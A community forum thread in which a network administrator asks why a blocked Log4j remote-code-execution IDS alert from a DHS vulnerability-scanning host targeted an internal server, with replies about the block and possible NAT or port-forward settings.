- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
IDS Log Entry
I continue to get this IDS firewall log entry:
vulnscan10.cyhy.ncats.cyber.dhs.gov
IP/port:100.27.42.250:48534
With event: Apache Log4j logging remote code execution attempt
The event is blocked.
It is directed to a SINGLE internal server NOT open to the internet. It appears to be a valid website. My concerns are,
1) How does this website even know about this particular server? ........it's rhetorical.
2) Why is it trying to run code on it? again rhetorical.
I am just at a loss to this. Server scanned, all clean. It is a new server that was added in the last year, new OS.
I cannot find anything in event log on this server that coincides with this, would give any hint as to why something on the outside is trying to get to it.
Thank you all in advanced!
Anyone else seeing this?
Solved! Go to solution.
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
The IDS log indicates: The event is (was) blocked.
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
The IDS log indicates: The event is (was) blocked.
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
I agree and happy, it was blocked. I am puzzled as to how this outside website even knows about this server, as it is totally cut off from the outside world. A little wary it's from DHS.gov.....lol
Thank you RWelch, appreciate it!
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Are you sure you don't have nat or port forward configured?
Have you got NO-NAT enabled?
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
We do have some port forwards for several servers, but nothing forwarded to this server. We run some client VPN connections; NO-NAT is not enabled. No local users have rights to this server. Just very odd that the IP, FQDN of this IDS alert resolves to dhs.gov on AWS. These events were just Monday and yesterday. Nothing today. I did upgrade firmware to 211.4 last night, may have fixed that issue but not our speed issue. Our internet speeds are still very low coming through our MX250. I might open a ticket today. We have gig/gig fiber. Before new firmware we were getting 900/200. Today I am getting 500/200. Not good.
